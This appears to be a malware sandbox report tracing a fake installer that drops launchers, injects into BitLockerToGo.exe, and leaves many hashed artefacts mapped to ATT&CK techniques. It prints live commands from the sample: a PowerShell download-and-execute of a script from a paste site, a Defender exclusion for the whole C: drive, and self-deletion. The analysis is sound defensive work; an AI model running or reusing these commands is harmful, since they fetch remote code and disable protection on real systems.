- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 504
      4⤵
      Program crash
      PID:3960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500
      4⤵
      Program crash
      PID:3432
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5344
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 500
      4⤵
      Program crash
      PID:5944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 496
      4⤵
      Program crash
      PID:2580
- C:\Program Files\launcher289\3.exe
  "C:\Program Files\launcher289\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5444
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1608
    - - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups /fo csv
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3448 -ip 3448
1⤵
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3448 -ip 3448
1⤵
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2224 -ip 2224
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2224 -ip 2224
1⤵
PID:5320

C:\Users\Admin\Downloads\Install_x64.exe
"C:\Users\Admin\Downloads\Install_x64.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5808
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5960
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:6044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 496
      4⤵
      Program crash
      PID:1932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 376
      4⤵
      Program crash
      PID:1400
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5352
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 528
      4⤵
      Program crash
      PID:4980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 536
      4⤵
      Program crash
      PID:3432
- C:\Program Files\launcher289\3.exe
  "C:\Program Files\launcher289\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5584
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5944
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6044 -ip 6044
1⤵
PID:656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6044 -ip 6044
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2012 -ip 2012
1⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2012 -ip 2012
1⤵
PID:4860

C:\Users\Admin\Downloads\Install_x64.exe
"C:\Users\Admin\Downloads\Install_x64.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\launcher289\2.exe

Filesize
13.2MB

MD5
999f8337abeb722689ff0be5ea88f1dd

SHA1
43e8b21ae111121f325cf02b6a21c8116e053585

SHA256
5212acc0f637e974eef3982005adaa5092bf8ac20511c85e973ddd5fd9320c28

SHA512
aa6b789a93b528889edcd9cbec999fdfdb9d3fce0268ee302f525e9669dcdb1e293968904a6513345a49af13e9ffc73c9fa93b7a960cef49dfe71d6824434f0b

Download Submit
C:\Program Files\launcher289\3.exe

Filesize
14.7MB

MD5
7a2f4c00249de0cbd53babb71130892b

SHA1
d9eea6371d7f4fef777bada0cc8d7ba079126b7b

SHA256
b5225b27eae0b0d0308fad52865af52ff25a6f2b054f93372d5f8be15b2a48b7

SHA512
1495741dc461c504fc22b96ca658b500fe3002c03b5d5ce5c0787d75e96b3f7be8226cdc5df2a89db13cc69901ddc0fafca80114aae3707b818be62e031f80f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9abb7aa9bf89ebe7315275a538847a13

SHA1
18f968f32c212013cccf8dcdae60d53349557150

SHA256
34d943499eba02acf9809aaf1f02fe84436d99dee431c3a730098bc21b330548

SHA512
ed364ecdccc49a997319851189749225c49af0cadaa464b59fae7fb2bfa794ac8adca8b31665deb64f4ba39b4dbd4c796356411d27e46c5c3def0ce4ab4f9db9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
24KB

MD5
e638155abcd2e1d15f3f9a9f81f31329

SHA1
b14b5df6580438529a70a856dd174cc27fe6c38b

SHA256
9378fc584393b58b5c19ada10ebbdbad9b961a071d62080a402c80dade0cf3a2

SHA512
6c84f81167a610bac9eb0a4229430d3121758df3e4aa0d03e1306e231b47060c448f4933b32ecc1712cf7edc4da2ef0cfb88254ed55270d04e367b00268fcb6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6344564097353c8e7e68991fffa80d88

SHA1
2ac4d108a30ec3fbd2938b0563eb912415ea7c62

SHA256
d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da

SHA512
e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
6c00ce295ac3b6c63d051c75f6862eaa

SHA1
da2d419145a69e2f50d815d98d936b5c89a35e12

SHA256
751e931b25e470ec88386f765acbe4317fad9ade7ea2f5755a4a2c530faab627

SHA512
3d73ada4e37af133639efcb691003a97e2b64ffc72b24bbae490456d91c6694d8c9c39da37b26e2fd413cf3c0bdbb99961f4e21c7ba72f7bf77bfc213ccf3aa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3dd09f4e8ef58fad518a87fc5ec13211

SHA1
2c422748586305b9c3b361c377fc114c94dda7c0

SHA256
3e500af589defe6578b50e9af8bebdeb5db94f2497d838e6ceee7f854c12a640

SHA512
834891a53725693a8cbb123f6d0a17c8b50ddda65df676391611609ba447fb2a18549c636f1c25a06d99c038c2700a877c0769441203bbee79e386abcc2aa2d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e4e46cbdbc85fd5b47dbf39462cf2726

SHA1
4778feb7ec930d7958b536ea6833868bd80320cc

SHA256
a047815d0e5fa1d3d712c11f9b00329e477497c36c9dba35162620890266ca6a

SHA512
c3668a48ed7fee7b3b6cf90654f7ad6270068ee25131c24a9abe2cf50a01ad836eb3b94e1a4b9ebec604e5678a4e05da9850b33237aceeb74e082a904bc87e07

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yel8o60i.default-release\activity-stream.discovery_stream.json.tmp

Filesize
18KB

MD5
76c52d69811d1d0bdd13ca1c1e1d1f2c

SHA1
986de51efa7f1dc1fb41afa23270c8ccad9bd8e2

SHA256
6438f1dd9a913c3e74fc16c1fefc37660e900a0c8f58fdb9c3bf30aea566f69f

SHA512
99e80f59aa8dd459bdf5059cb92b70654bf51ee4c849a51c16d46049cd3e93b7eaf56f66167ca27535a4b6fad6c4cead15f0297f488e580f2d4c02704bea8f6a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yel8o60i.default-release\cache2\entries\68BC2ADA259BF925235C7E6BF89FCA3B60EECD19

Filesize
60KB

MD5
d3ef8ef4f5099e30aaa653ace13cb0ca

SHA1
16f8bee892a9a446e4d5aae581333aa631965782

SHA256
5e6a9d76f2f924704e89edb8da4f651fcd0ec17a559f901f21e817ba73ab2d5c

SHA512
eeb3b77dc5ec082f8754f991c6a335cee8d374c8efb85f511f5069f890cea35cb9fd81f35b480452e7c5f6f5294a08560dab116f50a51f0ecd4ea9df676de237

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yel8o60i.default-release\cache2\entries\9357B92D7A82DC731CBB46EBC4F197AB314C7C11

Filesize
218KB

MD5
2ddee122b04fb7da1cde4ca12c436a46

SHA1
2307f7dcdc0b0f9031698104d60610290e411a68

SHA256
5e696cb9771d6b8c7cb212a5f52d3ef5195ba2a44e3da812972ba01f46e03c1c

SHA512
44f04c8df1421cf66c75ee960b4f8c9fd8bdefecc852151760099100c909c89f6dde14f2d2afc9a6eff3174b9ff310e181ec4f15f539138e620125e70f22c3f2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yel8o60i.default-release\thumbnails\c864820091d595e0cf9489e4c7aef6d3.png

Filesize
23KB

MD5
c4e47d9334363a8140314cba120b2c52

SHA1
862bce1906a5b269b8e2e74a805b7dc5158ed841

SHA256
e795ff821dbd884ffd0f7265ed1487a451f4f21340fe2708fc74355c631b0366

SHA512
ff61b7c4f33693ad7704cf855abcbd8a84d49c7b4eb3352cdfd991299092b7387c709b9b38f49d372c1a7e7841cc681d73fa6f293a47dfdb7497ef47bc144460

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
4d52399020a24c1f6b4254cc7252504b

SHA1
2afe0c8994c64898d5fe16ca68811438ef19b0ee

SHA256
e75a14ce8abaea1788c4361552ef9ef2b86ea02485eb4ad5f8c22c9c49ece3e7

SHA512
a481726d4ef1dfd67a86ae79e16abda87a0f370310758cc8a1bb2516a69557129e9612b9430c0ae11d7ddf72e1afc3375f5649a09bb53febe5cc16718ba976b4

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
f065a39d7e06597189e073755a0c1719

SHA1
f2ce3c9d697f40ab82ec0fecce46de6b354b4c54

SHA256
5ce6608613c37cdb3b66ddee4db699f41b06bb3906301b29c5f5039b8ce6356b

SHA512
c361ae3950de1fb738ef9b18d58786819ae246c21631bdfe4c392a41a859e25fabbdfd473d42d875846cb4a1abbbe798b29512264f9aa3f9558e067795468e20

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\u2fVH81mLqPj_vY5yR0cndQx2J_qnCY=\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
a7349236212b0e5cec2978f2cfa49a1a

SHA1
5abb08949162fd1985b89ffad40aaf5fc769017e

SHA256
a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082

SHA512
c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\u2fVH81mLqPj_vY5yR0cndQx2J_qnCY=\PresentationNative_cor3.dll

Filesize
1.2MB

MD5
e67dff697095b778ab6b76229c005811

SHA1
88a54a3e3ff2bf83a76bbf5df8a0e50bdb36bcdc

SHA256
e92b997f6f3a10b43d3fdc7743307228aa3b0a43430af60ccb06efa154d37e6a

SHA512
6f2a2bbbfa0464537fccb53d40239a294dca8fd477e79d70cd9f74079da48525a300675d3b0daae292432adbb9dd099fd4dc95b6fe2794f4c5f3a7e56e15ef51

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\u2fVH81mLqPj_vY5yR0cndQx2J_qnCY=\vcruntime140_cor3.dll

Filesize
116KB

MD5
d6ac34c46569efe379b58f9b7bbcb6fc

SHA1
f9f67352566bb5f98a7336248d8543d9ab4da041

SHA256
cff0ced8b2193adff2c06119f70a037b6b79b6fc6c4a19664d4e42bc1c06a9f6

SHA512
09a0e43293d39bd465e87e481bf98b1f696eb633d4f49038553e77a9ecd654318db114ee3f0ed85d05b09d1712835b18aa968fd5b304142c3979e1433b770513

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\u2fVH81mLqPj_vY5yR0cndQx2J_qnCY=\wpfgfx_cor3.dll

Filesize
1.9MB

MD5
24ea1814e6701927b9c714e0a4c3c185

SHA1
95c27a6b1f5927e3021cb6f9d5ef5998b2c4560a

SHA256
d2ebedc0004d5e336c6092e417c11c051767c7dcbcb80303f3484fd805e084ae

SHA512
d6c2f32818970d989c834babeac1ce845e832b853ce1c0b3f7ecbfd41331b7d519461bcc0ef07fd35382f263b9e26ac47bb22f0370071913900fc40e3e2656f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\85b827eaa63db5c3739f438a69b3bfd9

Filesize
12B

MD5
47c7ac72dbbee1c7fe62a171ed088a63

SHA1
0eab41da626f8fe1ea37ef4447ce7b88fbe1b6d7

SHA256
80e8feb5dbf1223c1c5d1624f7eed9f7a5d5a2e9c8aba847e23b025d00a35dd6

SHA512
68df22f953d3af2ee255ab6a58889de5537c4f491c9492489d009947a6c6518d2a35142c248f8e951bb07845e1daf851229f9721dbef94e43b500061f8e3e8c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2nr03ii.k2u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Local\Temp\~.exe

Filesize
14.1MB

MD5
52f1a924293c9e5be84556a759f4fd3c

SHA1
a877bc61b2d9339f3ddd45a19fdc055442877dd2

SHA256
58efc3692fbe04bf770e03b702f0585a47d9b6b02359cb5a543b80a8bcd4b0c8

SHA512
1ab2355509b05104881cc547f6526fb0e10f3b1830caf71020bb7eb5ca451a7080b182adefb03543c86827d06a623363803d87760a2f710a8a213e8ed4c55741

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
54d19d4b3a457179931ca48631ec3cfe

SHA1
a0cf0f2bd6310d0760e6493282bedab42ff11ffe

SHA256
c977bcbda951f266b0c0ad3883b95f1d688a25ad2fe8519d79ba458bba343e35

SHA512
6fa178a5cdb273041ac6a65281ec5a8667c6974673a106727eb37f5ac56d35fd5034b24268f31f3f439122f344e61ad6dfd62ff3dd2aa3e03e12b1ef53b7b1e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
5KB

MD5
6f57fb725f4c2adba2641bc2da4665a9

SHA1
f41999517d2fced90f66857c04cc8e2afa53f9a2

SHA256
f0d9d6508bbf350b83345d8963dbc1118648e781f73113dba6b6ad9683507db7

SHA512
833e04ef023eb660738e0aef38133457053b30858cd547a4673d738c3baf8b16e444cc0270f527e10d54202c712ab71026c68dab2ffc926608cbfc39862b32e6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
dfce0d9dba78735c6c585357a81ac2e6

SHA1
190437b33c255ba976d8094ccc5ccf219700ecb3

SHA256
b5ced8c22a8582213b855d65213130e8d8f6137c6c9639e24609ba34c100712c

SHA512
8b1647f3345578ff0422db2848706ee38b28619ac1d84fbd1f5c52d7840b9efbabf672ee9d86bc8fd0815e53b663750c41638cca2428a9cbb9d1d07f064e892b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
7KB

MD5
87db68b52e3b47296510ca67cf1ef7cc

SHA1
e3de0f1b141edfaf206da39c6356e7b35f5f1f27

SHA256
98fc709598fcab65b55617d866186223014479308eba73dc0f2ad439a5a34be8

SHA512
c05ab4434c16c3ab8e309728cf8bab66f6b7f5c5993bf4a3a73339f8225b9c02a1d8b05b249decbbb458808f1ecc30ff1290c866a38bf4569af3bcf6049b444b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
18KB

MD5
e7e22b8e43eed78cb5373ec74295dffa

SHA1
258e41fa41867eaf6aa44e9b0e4aca914d7a4361

SHA256
3f10f21abd032254856bdde17c73c998d8a82d143d62dd1f2635d8b9e1ceaa01

SHA512
568bff558f5a3eae45b8da7d79ab33ba2400e30e59fe597dc05d242efc834c534d6bd474bebb84ae0f4507c01ddb48e625fc209e7e7b97a6303bcd845dab36cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
18KB

MD5
54ed8d8ecdbb5db9696f403cfa139753

SHA1
4cca362e44863236f36b1913c9edf9a1f737d727

SHA256
8bdb15949227c0ff4c6877f01ce68fb758a60b33856fc53e67b21f2dd260f5ad

SHA512
e114122967939afcc33c98331d4967cda3552f1af3f654fed82cdafde57e4fcef720c33a427c3bd51fad5e4c913687c3e376259f474e8e3edf02dba1756b27e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
18KB

MD5
a2a7122d75d5c1203be465b809a85af7

SHA1
e01771a036e4b73272e93de69d4ab0cf4d4c99cb

SHA256
e2023e984de4478b4cc89e217de12f09e09221850a2a2a885ccc20ecce22970d

SHA512
ea32c13645e98e552800a4f7860c43cb22691896edfd9cd270f5af22031f7bbd7d7abf825e189ad4f37c50ab75b8f607da62e2a618cd990fb6c2b71320ee79db

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
11KB

MD5
cc3feb3395fad97a3e450372af0ef190

SHA1
eef3f75ebc5c01e014ea2701b9baee5edbe30ae1

SHA256
cf0466e94b64c57a0a6c942439a05804d8d40b4c9c92ea85591c8a95297b6d7e

SHA512
eefdf1744d41c13bf4f34d070fcd53b22794cafc0d37c8666c0671454103dcc629bb18d61395069e9e922ec8a578446963febf713dbb9ab6570794f1fe25239d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\AlternateServices.bin

Filesize
6KB

MD5
1de22d5e6181c2e9effb6f948f58bc2f

SHA1
33d699d07f144745fd47a1d6733e72ca20984c06

SHA256
cf479f6708b3f0ce0f8ce9cf6acffaf0164eb6e3e80e0d438689a4a364d59da9

SHA512
847c9eabcb31660d3528b7f4fda0758eca1ee992f1dfd6398e5a870313685f95e0d32b4c06326ae931f328decb67b04271c5ce7ff4467293ae1d8673c36dc388

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\AlternateServices.bin

Filesize
8KB

MD5
b1e10460b5c8bb3128094ab7f114c48e

SHA1
855fa02d496704174cdb1eea624a20be1c4c7c1e

SHA256
9d39d6d31b6cef19ec5bb8b5703aa628d6112bda17ff5683ef30f6f9ce78e240

SHA512
fa0b7a5eddb8d5fd7dd1a500ded4b79f586fe1b8a09b5d805578eff18a5d5c0187092363ecf81410bd83740e5f5630d988e982cfd986a89c8272c9031b282dbd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\AlternateServices.bin

Filesize
18KB

MD5
b023132f03d211ea7e0c38fec13bf462

SHA1
c92ac2ba06a18fb92b2fed3d079e1c3c68410a77

SHA256
80e1314749a0202659c5f282d2251e044175721b98fecb30f7738a5311a34d76

SHA512
5973fabef691f6855649c591974bf1741fcd9fbee2dd33d74dda92355c87d61f84421f367180a088d6c4dbceebe0fe560476fe7827151a10dc1fd3aae655d3ee

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
30600a83ed70f62bd20d3d3c914a314e

SHA1
4ab484b4df2572d93824140a315372c4bbeac48e

SHA256
3788731e80195a3b50525509d1f7fb249672d940724b06ce750c3ea88a595b2d

SHA512
93e692931680f5081e3911ed27981994cec22ffdb7d8524dc99d39ef2d271af5a53f9d3506f5de18bb9cd200b61b2219950058b7ba40886ca049624a4e8bccbb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
e41026dbc4c23292debc298f7cda1b86

SHA1
29ce678f6752b2bfdbe9c84bab4239d11262535f

SHA256
388ee6b1fa77a9704948533a7516bcbdad2d4ce5c0f31745242810959f0807dd

SHA512
4529dcc2ac62364191e26c3104fd42ff58e16831ad7bbe12586fac3edd6fedf78db06cfdab1ad1837eee9bea801c83600b2c57cb3704773fd85410519f6bd21f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\datareporting\glean\db\data.safe.tmp

Filesize
55KB

MD5
f8bb2abcdf2c4b3e723710107ed880bf

SHA1
4f1867f0dca702d4587c7cd92d9949908f3fbea1

SHA256
6536ec46d86934b5ae5d1ce0d357ee713c59e3034191b06a9b7b78e50c5e7baa

SHA512
26035fee5e86bdd49c088845030e45ed7cb6e1deff6f56e92d97b17cd895348559501a6b12d7242d1dff462f34f969c288677ca7b17d974b4aa8fe92a2893824

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yel8o60i.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
22c0a65033027efc25828816f9d9db8e

SHA1
eb779d628836911d41e29270e923582d4a52db65

SHA256
b069a4bf1b238e67b6517b7f773ee2397835633f850ff7813ede73bfaab6897b

SHA512
17100395c0ee16e563579f6ada13f0349712b5a3efaf54b8ade4eb743bdfeda026c572b0bfc3744ebe303a6e5040ec4a64c9f77ebcfa1d9294042a238c491120

Download Submit
